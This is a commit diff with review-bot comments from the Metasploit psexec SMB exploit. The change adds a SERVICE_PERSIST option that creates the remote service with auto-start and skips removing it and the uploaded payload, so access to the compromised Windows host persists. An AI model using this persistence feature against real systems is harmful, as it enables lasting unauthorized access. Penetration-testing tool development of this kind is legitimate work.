Auto persist

bug/bundler_fix
Meatballs 2014-04-05 18:50:49 +01:00
parent fd7f35d8b2
commit 2c9209f8b1
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 36 additions and 10 deletions


@ -23,18 +23,34 @@ module Exploit::Remote::SMB::Psexec
OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]), OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]) OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
], self.class) ], self.class)
register_advanced_options(
[
OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false])
], self.class)
end end
# Retrieve the SERVICE_NAME option, generate a random
# one if not already set.
#
# @return service_name [String] the name of the service.
def service_name def service_name
@service_name ||= datastore['SERVICE_NAME'] @service_name ||= datastore['SERVICE_NAME']
@service_name ||= rand_text_alpha(8) @service_name ||= rand_text_alpha(8)
end end
# Retrieve the SERVICE_DISPLAY_NAME option, generate a random
# one if not already set.
#
# @return service_display_name [String] the display name of the service.
def display_name def display_name
@display_name ||= datastore['SERVICE_DISPLAY_NAME'] @display_name ||= datastore['SERVICE_DISPLAY_NAME']
@display_name ||= rand_text_alpha(16) @display_name ||= rand_text_alpha(16)
end end
# Retrieve the SERVICE_DESCRIPTION option
#
# @return service_description [String] the service description.
def service_description def service_description
@service_description ||= datastore['SERVICE_DESCRIPTION'] @service_description ||= datastore['SERVICE_DESCRIPTION']
end end
@ -89,8 +105,14 @@ module Exploit::Remote::SMB::Psexec
return false unless scm_handle return false unless scm_handle
if datastore['SERVICE_PERSIST']
opts = { :start => SERVICE_AUTO_START }
else
opts = {}
end
vprint_status("#{peer} - Creating the service...") vprint_status("#{peer} - Creating the service...")
svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, {}) svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, opts)
case svc_status case svc_status
when ERROR_SUCCESS when ERROR_SUCCESS
@ -133,6 +155,8 @@ module Exploit::Remote::SMB::Psexec
# Maybe we could have a force cleanup option..? # Maybe we could have a force cleanup option..?
if service_exists if service_exists
print_warning("#{peer} - Not removing service as it already existed...") print_warning("#{peer} - Not removing service as it already existed...")
elsif datastore['SERVICE_PERSIST']
print_warning("#{peer} - Not removing service for persistance...")
else else
vprint_status("#{peer} - Removing the service...") vprint_status("#{peer} - Removing the service...")
svc_status = dce_deleteservice(dcerpc, svc_handle) svc_status = dce_deleteservice(dcerpc, svc_handle)
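Review bot: The warning added in the cleanup branch misspells "persistence" and does not name the service it leaves behind, so the output gives no record of what has to be removed by hand later; `print_warning("#{peer} - Not removing service #{service_name} for persistence...")` would cover both. The new YARD tags also put a name where the type belongs: `# @return [String] the name of the service.` is the form YARD parses. `service_description` appears to return nil when the option is unset (its default is nil), so `[String, nil]` would be more accurate there. The service-creation and cleanup methods both start and end outside their hunks.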


@ -196,15 +196,17 @@ class Metasploit3 < Msf::Exploit::Remote
psexec(file_location, false) psexec(file_location, false)
print_status("Deleting \\#{filename}...") unless datastore['SERVICE_PERSIST']
sleep(1) print_status("Deleting \\#{filename}...")
#This is not really useful but will prevent double \\ on the wire :) sleep(1)
if datastore['SHARE'] =~ /.[\\\/]/ #This is not really useful but will prevent double \\ on the wire :)
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") if datastore['SHARE'] =~ /.[\\\/]/
simple.delete("\\#{fileprefix}\\#{filename}") simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
else simple.delete("\\#{fileprefix}\\#{filename}")
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") else
simple.delete("\\#{filename}") simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
simple.delete("\\#{filename}")
end
end end
end end
handler handler
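Review bot: When SERVICE_PERSIST is set, the new `unless` block skips the delete step without printing anything, while the mixin prints a warning for the service it leaves in place. Turning it into `if datastore['SERVICE_PERSIST']` with a `print_warning("Not deleting \\#{filename}...")` branch and the existing delete code under `else` would put the file left on the share into the run output, so it can be tracked and removed later. As a smaller style point, both branches of the inner `if` make the same `simple.connect(...)` call, which could be hoisted above it now that the block is being re-indented anyway. The enclosing method starts and ends outside the hunk.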